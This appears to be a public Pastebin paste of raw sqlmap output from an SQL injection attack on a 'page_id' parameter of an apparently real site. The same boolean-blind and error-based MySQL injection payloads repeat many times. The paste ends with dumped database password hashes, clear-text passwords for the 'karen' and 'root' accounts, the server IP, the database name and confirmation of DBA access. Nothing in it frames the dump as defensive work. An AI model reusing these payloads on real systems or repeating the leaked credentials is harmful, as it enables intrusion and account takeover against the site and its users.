  851.     Payload: page_id=28167956 AND 1228=1228
  852.  
  853.     TYPE: error-based
  854.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  855.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  856. ---
  857.  
  858. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  859. ---
  860. Place: GET
  861. Parameter: page_id
  862.     TYPE: boolean-based blind
  863.     Title: AND boolean-based blind - WHERE OR HAVING clause
  864.     Payload: page_id=28167956 AND 1228=1228
  865.  
  866.     TYPE: error-based
  867.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  868.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  869. ---
  870.  
  871. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  872. ---
  873. Place: GET
  874. Parameter: page_id
  875.     TYPE: boolean-based blind
  876.     Title: AND boolean-based blind - WHERE OR HAVING clause
  877.     Payload: page_id=28167956 AND 1228=1228
  878.  
  879.     TYPE: error-based
  880.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  881.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  882. ---
  883.  
  884. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  885. ---
  886. Place: GET
  887. Parameter: page_id
  888.     TYPE: boolean-based blind
  889.     Title: AND boolean-based blind - WHERE OR HAVING clause
  890.     Payload: page_id=28167956 AND 1228=1228
  891.  
  892.     TYPE: error-based
  893.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  894.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  895. ---
  896.  
  897. DATABASE management system users password hashes:
  898. [*] karen [2]:
  899.     password hash: 1c00fc2b05570f2f
  900.     password hash: 248036c235f60aa8
  901. [*] nujeplies [1]:
  902.     password hash: NULL
  903. [*] root [5]:
  904.     password hash: 248036c235f60aa8
  905.     password hash: 248036c235f60aa8
  906.     password hash: 4fc67fc309a271b8
  907.     clear-text password: karen
  908.     clear-text password: karen
  909.     password hash: 4fc67fc309a271b8
  910.     clear-text password: karen
  911.     clear-text password: karen
  912.     password hash: NULL
  913. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  914. ---
  915. Place: GET
  916. Parameter: page_id
  917.     TYPE: boolean-based blind
  918.     Title: AND boolean-based blind - WHERE OR HAVING clause
  919.     Payload: page_id=28167956 AND 1228=1228
  920.  
  921.     TYPE: error-based
  922.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  923.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  924. ---
  925.  
  926. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  927. ---
  928. Place: GET
  929. Parameter: page_id
  930.     TYPE: boolean-based blind
  931.     Title: AND boolean-based blind - WHERE OR HAVING clause
  932.     Payload: page_id=28167956 AND 1228=1228
  933.  
  934.     TYPE: error-based
  935.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  936.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  937. ---
  938.  
  939. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  940. ---
  941. Place: GET
  942. Parameter: page_id
  943.     TYPE: boolean-based blind
  944.     Title: AND boolean-based blind - WHERE OR HAVING clause
  945.     Payload: page_id=28167956 AND 1228=1228
  946.  
  947.     TYPE: error-based
  948.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  949.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  950. ---
  951.  
  952. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  953. ---
  954. Place: GET
  955. Parameter: page_id
  956.     TYPE: boolean-based blind
  957.     Title: AND boolean-based blind - WHERE OR HAVING clause
  958.     Payload: page_id=28167956 AND 1228=1228
  959.  
  960.     TYPE: error-based
  961.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  962.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  963. ---
  964.  
  965. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  966. ---
  967. Place: GET
  968. Parameter: page_id
  969.     TYPE: boolean-based blind
  970.     Title: AND boolean-based blind - WHERE OR HAVING clause
  971.     Payload: page_id=28167956 AND 1228=1228
  972.  
  973.     TYPE: error-based
  974.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  975.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  976. ---
  977.  
  978. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  979. ---
  980. Place: GET
  981. Parameter: page_id
  982.     TYPE: boolean-based blind
  983.     Title: AND boolean-based blind - WHERE OR HAVING clause
  984.     Payload: page_id=28167956 AND 1228=1228
  985.  
  986.     TYPE: error-based
  987.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  988.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  989. ---
  990.  
  991. banner:    '5.0.45-log'
  992.  
  993. CURRENT USER:    'root@208.43.165.226'
  994.  
  995. CURRENT DATABASE:    'orcataco_bumperstic'
  996.  
  997. CURRENT USER IS DBA:    'True'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!